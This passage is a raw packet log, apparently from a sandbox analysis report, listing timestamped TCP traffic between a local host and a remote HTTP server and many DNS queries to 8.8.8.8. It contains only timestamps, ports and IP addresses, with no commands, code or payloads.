                Dec 21, 2020 08:33:21.240499020 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240511894 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240514040 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240529060 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240537882 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240545034 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240560055 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240569115 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240577936 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240595102 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240601063 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240613937 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240633011 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240636110 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240652084 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240659952 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240677118 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240685940 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240698099 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240712881 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240720034 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240741968 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240746021 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240767002 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240773916 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240791082 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240803003 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240812063 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240833044 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240833998 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240855932 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240871906 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240885973 CET4916780192.168.2.22103.141.138.119

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 21, 2020 08:33:20.079046011 CET5219753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:20.141259909 CET53521978.8.8.8192.168.2.22
                Dec 21, 2020 08:33:20.141686916 CET5219753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:20.181081057 CET53521978.8.8.8192.168.2.22
                Dec 21, 2020 08:33:31.913495064 CET5309953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:32.245913982 CET53530998.8.8.8192.168.2.22
                Dec 21, 2020 08:33:32.661679029 CET5283853192.168.2.228.8.8.8
                Dec 21, 2020 08:33:33.027492046 CET53528388.8.8.8192.168.2.22
                Dec 21, 2020 08:33:33.384108067 CET6120053192.168.2.228.8.8.8
                Dec 21, 2020 08:33:33.416837931 CET53612008.8.8.8192.168.2.22
                Dec 21, 2020 08:33:33.879810095 CET4954853192.168.2.228.8.8.8
                Dec 21, 2020 08:33:33.912573099 CET53495488.8.8.8192.168.2.22
                Dec 21, 2020 08:33:34.362772942 CET5562753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:34.397540092 CET53556278.8.8.8192.168.2.22
                Dec 21, 2020 08:33:34.881009102 CET5600953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:34.913418055 CET53560098.8.8.8192.168.2.22
                Dec 21, 2020 08:33:35.359441996 CET6186553192.168.2.228.8.8.8
                Dec 21, 2020 08:33:35.392252922 CET53618658.8.8.8192.168.2.22
                Dec 21, 2020 08:33:35.837912083 CET5517153192.168.2.228.8.8.8
                Dec 21, 2020 08:33:35.873585939 CET53551718.8.8.8192.168.2.22
                Dec 21, 2020 08:33:36.313498974 CET5249653192.168.2.228.8.8.8
                Dec 21, 2020 08:33:36.346338034 CET53524968.8.8.8192.168.2.22
                Dec 21, 2020 08:33:36.808887959 CET5756453192.168.2.228.8.8.8
                Dec 21, 2020 08:33:36.841499090 CET53575648.8.8.8192.168.2.22
                Dec 21, 2020 08:33:37.314598083 CET6300953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:37.347301960 CET53630098.8.8.8192.168.2.22
                Dec 21, 2020 08:33:37.787421942 CET5931953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:37.822774887 CET53593198.8.8.8192.168.2.22
                Dec 21, 2020 08:33:38.269783974 CET5307053192.168.2.228.8.8.8
                Dec 21, 2020 08:33:38.302434921 CET53530708.8.8.8192.168.2.22
                Dec 21, 2020 08:33:38.743330002 CET5977053192.168.2.228.8.8.8
                Dec 21, 2020 08:33:38.776042938 CET53597708.8.8.8192.168.2.22
                Dec 21, 2020 08:33:39.221379995 CET6152353192.168.2.228.8.8.8
                Dec 21, 2020 08:33:39.253777027 CET53615238.8.8.8192.168.2.22
                Dec 21, 2020 08:33:39.711550951 CET6279153192.168.2.228.8.8.8
                Dec 21, 2020 08:33:39.744498014 CET53627918.8.8.8192.168.2.22
                Dec 21, 2020 08:33:40.202322006 CET5066753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:40.229345083 CET53506678.8.8.8192.168.2.22
                Dec 21, 2020 08:33:40.652861118 CET5412953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:40.677072048 CET53541298.8.8.8192.168.2.22
                Dec 21, 2020 08:33:41.115207911 CET6532953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:41.149358988 CET53653298.8.8.8192.168.2.22
                Dec 21, 2020 08:33:41.607522011 CET6071853192.168.2.228.8.8.8
                Dec 21, 2020 08:33:41.640346050 CET53607188.8.8.8192.168.2.22
                Dec 21, 2020 08:33:42.085715055 CET4915753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:42.118233919 CET53491578.8.8.8192.168.2.22
                Dec 21, 2020 08:33:42.570028067 CET5739153192.168.2.228.8.8.8
                Dec 21, 2020 08:33:42.603332043 CET53573918.8.8.8192.168.2.22
                Dec 21, 2020 08:33:43.024233103 CET6185853192.168.2.228.8.8.8
                Dec 21, 2020 08:33:43.056792021 CET53618588.8.8.8192.168.2.22
                Dec 21, 2020 08:33:43.507846117 CET6250053192.168.2.228.8.8.8
                Dec 21, 2020 08:33:43.542844057 CET53625008.8.8.8192.168.2.22
                Dec 21, 2020 08:33:43.990227938 CET5165253192.168.2.228.8.8.8
                Dec 21, 2020 08:33:44.025953054 CET53516528.8.8.8192.168.2.22
                Dec 21, 2020 08:33:44.476102114 CET6276253192.168.2.228.8.8.8
                Dec 21, 2020 08:33:44.500294924 CET53627628.8.8.8192.168.2.22
                Dec 21, 2020 08:33:44.947941065 CET5690553192.168.2.228.8.8.8
                Dec 21, 2020 08:33:44.982953072 CET53569058.8.8.8192.168.2.22
                Dec 21, 2020 08:33:45.426358938 CET5460953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:45.462071896 CET53546098.8.8.8192.168.2.22
                Dec 21, 2020 08:33:45.893923044 CET5810153192.168.2.228.8.8.8
                Dec 21, 2020 08:33:45.929359913 CET53581018.8.8.8192.168.2.22
                Dec 21, 2020 08:33:46.404953957 CET6432953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:46.440226078 CET53643298.8.8.8192.168.2.22
                Dec 21, 2020 08:33:46.857896090 CET6488153192.168.2.228.8.8.8
                Dec 21, 2020 08:33:46.882116079 CET53648818.8.8.8192.168.2.22
                Dec 21, 2020 08:33:47.341500998 CET5532753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:47.365688086 CET53553278.8.8.8192.168.2.22
                Dec 21, 2020 08:33:47.811341047 CET5915053192.168.2.228.8.8.8
                Dec 21, 2020 08:33:47.838496923 CET53591508.8.8.8192.168.2.22
                Dec 21, 2020 08:33:48.293976068 CET6343953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:48.329663038 CET53634398.8.8.8192.168.2.22
                Dec 21, 2020 08:33:48.764221907 CET6504053192.168.2.228.8.8.8
                Dec 21, 2020 08:33:48.799899101 CET53650408.8.8.8192.168.2.22
                Dec 21, 2020 08:33:49.248095989 CET6136953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:49.272435904 CET53613698.8.8.8192.168.2.22
                Dec 21, 2020 08:33:49.738286972 CET6551553192.168.2.228.8.8.8
                Dec 21, 2020 08:33:49.773880959 CET53655158.8.8.8192.168.2.22
                Dec 21, 2020 08:33:50.200308084 CET6023653192.168.2.228.8.8.8
                Dec 21, 2020 08:33:50.234957933 CET53602368.8.8.8192.168.2.22
                Dec 21, 2020 08:33:50.703052044 CET5319853192.168.2.228.8.8.8
                Dec 21, 2020 08:33:50.727616072 CET53531988.8.8.8192.168.2.22
                Dec 21, 2020 08:33:51.166956902 CET5002753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:51.199632883 CET53500278.8.8.8192.168.2.22
                Dec 21, 2020 08:33:51.634434938 CET5924553192.168.2.228.8.8.8
                Dec 21, 2020 08:33:51.661459923 CET53592458.8.8.8192.168.2.22
                Dec 21, 2020 08:33:52.106240034 CET5584053192.168.2.228.8.8.8
                Dec 21, 2020 08:33:52.138839960 CET53558408.8.8.8192.168.2.22
                Dec 21, 2020 08:33:52.575071096 CET6166753192.168.2.228.8.8.8
                Dec 21, 2020 08:33:52.608187914 CET53616678.8.8.8192.168.2.22
                Dec 21, 2020 08:33:53.053771019 CET6373653192.168.2.228.8.8.8
                Dec 21, 2020 08:33:53.089116096 CET53637368.8.8.8192.168.2.22
                Dec 21, 2020 08:33:53.521665096 CET5980553192.168.2.228.8.8.8
                Dec 21, 2020 08:33:53.545923948 CET53598058.8.8.8192.168.2.22
                Dec 21, 2020 08:33:54.004151106 CET6232253192.168.2.228.8.8.8
                Dec 21, 2020 08:33:54.028563023 CET53623228.8.8.8192.168.2.22
                Dec 21, 2020 08:33:54.463464975 CET5281953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:54.495980978 CET53528198.8.8.8192.168.2.22
                Dec 21, 2020 08:33:54.918165922 CET5121553192.168.2.228.8.8.8
                Dec 21, 2020 08:33:54.950864077 CET53512158.8.8.8192.168.2.22
                Dec 21, 2020 08:33:55.372256041 CET6031253192.168.2.228.8.8.8
                Dec 21, 2020 08:33:55.396764994 CET53603128.8.8.8192.168.2.22
                Dec 21, 2020 08:33:57.806827068 CET6346353192.168.2.228.8.8.8
                Dec 21, 2020 08:33:58.138356924 CET53634638.8.8.8192.168.2.22
                Dec 21, 2020 08:33:58.565279007 CET6222453192.168.2.228.8.8.8
                Dec 21, 2020 08:33:58.600277901 CET53622248.8.8.8192.168.2.22
                Dec 21, 2020 08:33:59.039273977 CET5906453192.168.2.228.8.8.8
                Dec 21, 2020 08:33:59.074902058 CET53590648.8.8.8192.168.2.22
                Dec 21, 2020 08:33:59.513793945 CET5988553192.168.2.228.8.8.8
                Dec 21, 2020 08:33:59.538171053 CET53598858.8.8.8192.168.2.22
                Dec 21, 2020 08:33:59.963618994 CET6374953192.168.2.228.8.8.8
                Dec 21, 2020 08:33:59.999243975 CET53637498.8.8.8192.168.2.22
                Dec 21, 2020 08:34:00.431229115 CET5087853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:00.458333969 CET53508788.8.8.8192.168.2.22
                Dec 21, 2020 08:34:00.894161940 CET5846953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:00.927617073 CET53584698.8.8.8192.168.2.22
                Dec 21, 2020 08:34:01.345640898 CET5477353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:01.370101929 CET53547738.8.8.8192.168.2.22
                Dec 21, 2020 08:34:01.786082029 CET5216653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:01.813256025 CET53521668.8.8.8192.168.2.22
                Dec 21, 2020 08:34:02.207808971 CET5458953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:02.234920025 CET53545898.8.8.8192.168.2.22
                Dec 21, 2020 08:34:02.980644941 CET5811353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:03.016529083 CET53581138.8.8.8192.168.2.22
                Dec 21, 2020 08:34:03.739376068 CET5353353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:03.763997078 CET53535338.8.8.8192.168.2.22
                Dec 21, 2020 08:34:04.201909065 CET5769653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:04.226470947 CET53576968.8.8.8192.168.2.22
                Dec 21, 2020 08:34:04.632169008 CET5106853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:04.662421942 CET53510688.8.8.8192.168.2.22
                Dec 21, 2020 08:34:05.084239006 CET5294453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:05.116772890 CET53529448.8.8.8192.168.2.22
                Dec 21, 2020 08:34:05.539611101 CET5619053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:05.564255953 CET53561908.8.8.8192.168.2.22
                Dec 21, 2020 08:34:05.976373911 CET6387753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:06.008991003 CET53638778.8.8.8192.168.2.22
                Dec 21, 2020 08:34:06.425539017 CET6229953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:06.452527046 CET53622998.8.8.8192.168.2.22
                Dec 21, 2020 08:34:06.876219988 CET5323953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:06.900445938 CET53532398.8.8.8192.168.2.22
                Dec 21, 2020 08:34:07.333338022 CET6232053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:07.365592957 CET53623208.8.8.8192.168.2.22
                Dec 21, 2020 08:34:07.783689976 CET6150753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:07.810790062 CET53615078.8.8.8192.168.2.22
                Dec 21, 2020 08:34:08.236664057 CET5394053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:08.260979891 CET53539408.8.8.8192.168.2.22
                Dec 21, 2020 08:34:08.676565886 CET5908953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:08.709247112 CET53590898.8.8.8192.168.2.22
                Dec 21, 2020 08:34:09.131469011 CET5173953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:09.166901112 CET53517398.8.8.8192.168.2.22
                Dec 21, 2020 08:34:09.589118958 CET5355253192.168.2.228.8.8.8
                Dec 21, 2020 08:34:09.613442898 CET53535528.8.8.8192.168.2.22
                Dec 21, 2020 08:34:10.046735048 CET6113553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:10.082566023 CET53611358.8.8.8192.168.2.22
                Dec 21, 2020 08:34:10.515592098 CET4935753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:10.540024042 CET53493578.8.8.8192.168.2.22
                Dec 21, 2020 08:34:10.950223923 CET5345153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:10.974487066 CET53534518.8.8.8192.168.2.22
                Dec 21, 2020 08:34:11.411515951 CET6218353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:11.435686111 CET53621838.8.8.8192.168.2.22
                Dec 21, 2020 08:34:11.841891050 CET6165353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:11.866249084 CET53616538.8.8.8192.168.2.22
                Dec 21, 2020 08:34:12.305572033 CET5650953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:12.342263937 CET53565098.8.8.8192.168.2.22
                Dec 21, 2020 08:34:12.768889904 CET6217953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:12.793176889 CET53621798.8.8.8192.168.2.22
                Dec 21, 2020 08:34:13.222127914 CET5472153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:14.232207060 CET5472153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:15.224958897 CET53547218.8.8.8192.168.2.22
                Dec 21, 2020 08:34:15.630001068 CET5954953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:15.657253981 CET53595498.8.8.8192.168.2.22
                Dec 21, 2020 08:34:16.071230888 CET5046353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:16.098458052 CET53504638.8.8.8192.168.2.22
                Dec 21, 2020 08:34:16.519520044 CET5902953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:16.546869040 CET53590298.8.8.8192.168.2.22
                Dec 21, 2020 08:34:16.966084957 CET6054153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:16.990459919 CET53605418.8.8.8192.168.2.22
                Dec 21, 2020 08:34:17.457360983 CET6273953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:17.481856108 CET53627398.8.8.8192.168.2.22
                Dec 21, 2020 08:34:17.911499977 CET6251153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:17.947513103 CET53625118.8.8.8192.168.2.22
                Dec 21, 2020 08:34:18.360188007 CET5440353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:18.384497881 CET53544038.8.8.8192.168.2.22
                Dec 21, 2020 08:34:18.821360111 CET6203853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:18.848465919 CET53620388.8.8.8192.168.2.22
                Dec 21, 2020 08:34:19.271018028 CET5037753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:19.295341015 CET53503778.8.8.8192.168.2.22
                Dec 21, 2020 08:34:19.715977907 CET5917153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:19.740425110 CET53591718.8.8.8192.168.2.22
                Dec 21, 2020 08:34:20.170018911 CET5972153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:20.202665091 CET53597218.8.8.8192.168.2.22
                Dec 21, 2020 08:34:20.615250111 CET5411053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:20.648192883 CET53541108.8.8.8192.168.2.22
                Dec 21, 2020 08:34:21.069551945 CET6517853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:21.093951941 CET53651788.8.8.8192.168.2.22
                Dec 21, 2020 08:34:21.521275997 CET5718553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:21.545727968 CET53571858.8.8.8192.168.2.22
                Dec 21, 2020 08:34:21.957238913 CET5185953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:21.984266996 CET53518598.8.8.8192.168.2.22
                Dec 21, 2020 08:34:22.409060955 CET6335553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:22.435983896 CET53633558.8.8.8192.168.2.22
                Dec 21, 2020 08:34:22.841989040 CET5912653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:22.874603033 CET53591268.8.8.8192.168.2.22
                Dec 21, 2020 08:34:23.283040047 CET5913653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:23.310132027 CET53591368.8.8.8192.168.2.22
                Dec 21, 2020 08:34:23.741769075 CET6193853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:23.765877962 CET53619388.8.8.8192.168.2.22
                Dec 21, 2020 08:34:24.340230942 CET5460353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:24.373184919 CET53546038.8.8.8192.168.2.22
                Dec 21, 2020 08:34:24.808307886 CET5647253192.168.2.228.8.8.8
                Dec 21, 2020 08:34:24.835433960 CET53564728.8.8.8192.168.2.22
                Dec 21, 2020 08:34:25.262887001 CET6495653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:25.289983988 CET53649568.8.8.8192.168.2.22
                Dec 21, 2020 08:34:25.710551977 CET4955853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:25.736001968 CET53495588.8.8.8192.168.2.22
                Dec 21, 2020 08:34:26.160768032 CET6048553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:26.185072899 CET53604858.8.8.8192.168.2.22
                Dec 21, 2020 08:34:26.614681959 CET6207053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:26.638876915 CET53620708.8.8.8192.168.2.22
                Dec 21, 2020 08:34:27.062807083 CET5219653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:27.087270975 CET53521968.8.8.8192.168.2.22
                Dec 21, 2020 08:34:27.520749092 CET5332453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:27.544984102 CET53533248.8.8.8192.168.2.22
                Dec 21, 2020 08:34:27.986989021 CET5920853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:28.019649982 CET53592088.8.8.8192.168.2.22
                Dec 21, 2020 08:34:28.446234941 CET5348953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:28.470670938 CET53534898.8.8.8192.168.2.22
                Dec 21, 2020 08:34:28.886102915 CET6010453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:28.910393953 CET53601048.8.8.8192.168.2.22
                Dec 21, 2020 08:34:29.338663101 CET5757953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:29.363013029 CET53575798.8.8.8192.168.2.22
                Dec 21, 2020 08:34:29.768058062 CET5651653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:29.792376041 CET53565168.8.8.8192.168.2.22
                Dec 21, 2020 08:34:30.464324951 CET5092653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:30.488459110 CET53509268.8.8.8192.168.2.22
                Dec 21, 2020 08:34:31.077270031 CET6126653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:31.113116026 CET53612668.8.8.8192.168.2.22
                Dec 21, 2020 08:34:31.530584097 CET5727953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:31.554856062 CET53572798.8.8.8192.168.2.22
                Dec 21, 2020 08:34:31.997639894 CET6527353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:32.024882078 CET53652738.8.8.8192.168.2.22
                Dec 21, 2020 08:34:32.732549906 CET6430753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:32.765345097 CET53643078.8.8.8192.168.2.22
                Dec 21, 2020 08:34:33.196446896 CET4997753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:33.223654985 CET53499778.8.8.8192.168.2.22
                Dec 21, 2020 08:34:33.646843910 CET6166753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:33.679516077 CET53616678.8.8.8192.168.2.22
                Dec 21, 2020 08:34:34.237993002 CET6527453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:34.262284994 CET53652748.8.8.8192.168.2.22
                Dec 21, 2020 08:34:34.832995892 CET5802953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:34.860109091 CET53580298.8.8.8192.168.2.22
                Dec 21, 2020 08:34:35.595055103 CET6453453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:35.622085094 CET53645348.8.8.8192.168.2.22
                Dec 21, 2020 08:34:36.298094034 CET5103153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:36.322339058 CET53510318.8.8.8192.168.2.22
                Dec 21, 2020 08:34:36.745827913 CET6425453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:36.769982100 CET53642548.8.8.8192.168.2.22
                Dec 21, 2020 08:34:37.184614897 CET5269653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:37.208910942 CET53526968.8.8.8192.168.2.22
                Dec 21, 2020 08:34:37.667687893 CET5647953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:37.691914082 CET53564798.8.8.8192.168.2.22
                Dec 21, 2020 08:34:38.116018057 CET6387453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:38.143122911 CET53638748.8.8.8192.168.2.22
                Dec 21, 2020 08:34:38.580862999 CET6298553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:38.605318069 CET53629858.8.8.8192.168.2.22
                Dec 21, 2020 08:34:39.014872074 CET5308353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:39.042166948 CET53530838.8.8.8192.168.2.22
                Dec 21, 2020 08:34:39.460103035 CET5612953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:39.484519958 CET53561298.8.8.8192.168.2.22
                Dec 21, 2020 08:34:39.922630072 CET5489853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:39.949804068 CET53548988.8.8.8192.168.2.22
                Dec 21, 2020 08:34:40.387022018 CET6099653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:40.411335945 CET53609968.8.8.8192.168.2.22
                Dec 21, 2020 08:34:40.870759010 CET5687153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:40.897921085 CET53568718.8.8.8192.168.2.22
                Dec 21, 2020 08:34:41.326885939 CET5668153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:41.351249933 CET53566818.8.8.8192.168.2.22
                Dec 21, 2020 08:34:41.787194967 CET5703053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:41.811691046 CET53570308.8.8.8192.168.2.22
                Dec 21, 2020 08:34:42.230077028 CET5684253192.168.2.228.8.8.8
                Dec 21, 2020 08:34:42.254544020 CET53568428.8.8.8192.168.2.22
                Dec 21, 2020 08:34:42.685045958 CET5476953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:42.712438107 CET53547698.8.8.8192.168.2.22
                Dec 21, 2020 08:34:43.125950098 CET5797653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:43.150263071 CET53579768.8.8.8192.168.2.22
                Dec 21, 2020 08:34:43.560400009 CET5782253192.168.2.228.8.8.8
                Dec 21, 2020 08:34:43.584795952 CET53578228.8.8.8192.168.2.22
                Dec 21, 2020 08:34:44.009450912 CET5781653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:44.036796093 CET53578168.8.8.8192.168.2.22
                Dec 21, 2020 08:34:44.446667910 CET5821853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:44.473915100 CET53582188.8.8.8192.168.2.22
                Dec 21, 2020 08:34:44.919285059 CET5292553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:44.954178095 CET53529258.8.8.8192.168.2.22
                Dec 21, 2020 08:34:45.405236959 CET5008853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:45.429600954 CET53500888.8.8.8192.168.2.22
                Dec 21, 2020 08:34:45.873823881 CET6397453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:45.901180983 CET53639748.8.8.8192.168.2.22
                Dec 21, 2020 08:34:46.292246103 CET6017453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:46.319533110 CET53601748.8.8.8192.168.2.22
                Dec 21, 2020 08:34:46.737219095 CET6256653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:46.761755943 CET53625668.8.8.8192.168.2.22
                Dec 21, 2020 08:34:47.190372944 CET6050253192.168.2.228.8.8.8
                Dec 21, 2020 08:34:47.214833975 CET53605028.8.8.8192.168.2.22
                Dec 21, 2020 08:34:47.621474028 CET6466653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:48.633337975 CET6466653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:49.651582956 CET6466653192.168.2.228.8.8.8
                Dec 21, 2020 08:34:49.678874969 CET53646668.8.8.8192.168.2.22
                Dec 21, 2020 08:34:50.100256920 CET6517253192.168.2.228.8.8.8
                Dec 21, 2020 08:34:50.124838114 CET53651728.8.8.8192.168.2.22
                Dec 21, 2020 08:34:50.556056976 CET6168353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:50.580688000 CET53616838.8.8.8192.168.2.22
                Dec 21, 2020 08:34:51.002749920 CET6228853192.168.2.228.8.8.8
                Dec 21, 2020 08:34:51.027374983 CET53622888.8.8.8192.168.2.22
                Dec 21, 2020 08:34:51.549300909 CET5847353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:51.576589108 CET53584738.8.8.8192.168.2.22
                Dec 21, 2020 08:34:51.980609894 CET5728453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:52.005129099 CET53572848.8.8.8192.168.2.22
                Dec 21, 2020 08:34:53.237574100 CET5801553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:53.261873960 CET53580158.8.8.8192.168.2.22
                Dec 21, 2020 08:34:53.671439886 CET5547053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:53.698725939 CET53554708.8.8.8192.168.2.22
                Dec 21, 2020 08:34:54.125663996 CET5097453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:54.152901888 CET53509748.8.8.8192.168.2.22
                Dec 21, 2020 08:34:54.601530075 CET6493453192.168.2.228.8.8.8
                Dec 21, 2020 08:34:54.628766060 CET53649348.8.8.8192.168.2.22
                Dec 21, 2020 08:34:55.073710918 CET6174153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:55.097997904 CET53617418.8.8.8192.168.2.22
                Dec 21, 2020 08:34:55.533246040 CET6406953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:55.557415962 CET53640698.8.8.8192.168.2.22
                Dec 21, 2020 08:34:55.991848946 CET6099553192.168.2.228.8.8.8
                Dec 21, 2020 08:34:56.016134977 CET53609958.8.8.8192.168.2.22
                Dec 21, 2020 08:34:56.432776928 CET6229153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:56.456948042 CET53622918.8.8.8192.168.2.22
                Dec 21, 2020 08:34:56.894483089 CET5090053192.168.2.228.8.8.8
                Dec 21, 2020 08:34:56.921036005 CET53509008.8.8.8192.168.2.22
                Dec 21, 2020 08:34:57.346008062 CET5413153192.168.2.228.8.8.8
                Dec 21, 2020 08:34:57.370323896 CET53541318.8.8.8192.168.2.22
                Dec 21, 2020 08:34:57.803312063 CET5429353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:57.836646080 CET53542938.8.8.8192.168.2.22
                Dec 21, 2020 08:34:58.262943029 CET5051953192.168.2.228.8.8.8
